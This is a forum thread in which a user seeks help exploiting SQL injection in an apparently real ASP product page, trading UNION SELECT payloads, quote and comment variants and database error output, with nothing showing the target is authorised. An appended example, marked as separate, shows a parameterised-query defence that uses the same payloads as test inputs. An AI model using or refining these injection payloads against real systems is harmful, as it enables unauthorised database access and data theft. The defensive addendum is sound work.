-
sql help needed
When testing sql injection with this command:
?idProduct=-1+UNION+SELECT+1,2+FROM+users--
I am getting this error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'UNION'.
/productdisplay.asp, line 36
I have tried adding a quotation mark before UNION, but get another error message on unclosed quotation marks. What I think I should be aiming for is to get the "must have equal expression of target sites" error message. Can anyone help me out?
-
Well, I can tell you that I highly doubt they are using columns named 1 and 2. That's what you are telling it to do :-P
-
Yeah, I know that, but I'm expecting to get the "must have equal number of expressions" error message. Then just add numbers 3,4,5.... until there's no error message. Then I'll substitute in column names after that.
-
I'm saying what you are essentially doing is writing a query that says:
SELECT 1,2 FROM users
but it needs to look like:
Select CollumnNameA,CollumnNameB From Users where UserID = 1,2
-
Not necessarily, the only thing that matters is that the # of columns matches and that the type is correct...
If I had to guess I'd say there is possibly an issue with a quote somewhere...the other thing that looks odd is the negative product number...are you sure that isn't wigging it out?
-
Yeah, I just added the -1 because I've noticed in the past that it normally works, but I tried without the negative and it's the same error.
-
My best guess would be something to the effect of:
?idProduct=1'+UNION+SELECT+(1,2)+FROM+users--
?idProduct=1"+UNION+SELECT+(1,2)+FROM+users--
Since it is choking on the union, my thought is it has to be something with the argument to idProduct and how the script is enclosing it in the subsequent SQL query...
-
Ok, with this injection:
1'+UNION+SELECT+(1,2)+FROM+users--
I get:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' UNION SELECT (1,2) FROM users--'.
/productdisplay.asp, line 36
and with this: 1''+UNION+SELECT+(1,2)+FROM+users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ''.
/productdisplay.asp, line 36
-
What does:
'+UNION+SELECT+(1,2)+FROM+users--
''+UNION+SELECT+(1,2)+FROM+users--
return? Note: no numeric argument there and the second is two '
or
1+UNION+SELECT+1,2+FROM+users/*
or
1/**/UNION/**/1,2/**/FROM/**/users/*
-
These are just returning similar errors to before
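
Added example, not part of the thread: one way the server side could handle `idProduct` so that inputs like those above never reach the SQL text and driver errors are not echoed to the client. It uses Python with sqlite3 as a stand-in for the ASP page and SQL Server; the table layout, sample rows and function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data; the real schema is not shown in the thread.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (idProduct INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'widget', 9.99);
        INSERT INTO users VALUES ('admin', 'constructed-secret');
    """)
    return db

def parse_id(raw):
    """Accept only a short run of ASCII digits; anything else is rejected."""
    if raw.isascii() and raw.isdigit() and len(raw) <= 9:
        return int(raw)
    return None

def product_display(db, raw_id, log):
    """Return (status, body). Error detail goes to the log, never to the client."""
    pid = parse_id(raw_id)
    if pid is None:
        log.append(f"rejected idProduct={raw_id!r}")
        return 400, "Invalid product id"
    try:
        # Bound parameter: the value is never concatenated into the statement.
        row = db.execute(
            "SELECT name, price FROM products WHERE idProduct = ?", (pid,)
        ).fetchone()
    except sqlite3.Error as exc:
        log.append(f"db error: {exc}")
        return 500, "An error occurred"
    if row is None:
        return 404, "Product not found"
    return 200, f"{row[0]}: {row[1]:.2f}"

# Values from the thread as the server sees them after URL decoding ('+' becomes a space).
THREAD_INPUTS = [
    "-1 UNION SELECT 1,2 FROM users--",
    "1' UNION SELECT (1,2) FROM users--",
    "1'' UNION SELECT (1,2) FROM users--",
    "1/**/UNION/**/1,2/**/FROM/**/users/*",
]

def run_thread_inputs():
    db, log = make_db(), []
    return [product_display(db, v, log) for v in THREAD_INPUTS], log
```

The rejected values land in `log`, which gives the operator a record of the probing without showing the query structure or the script line number to the requester.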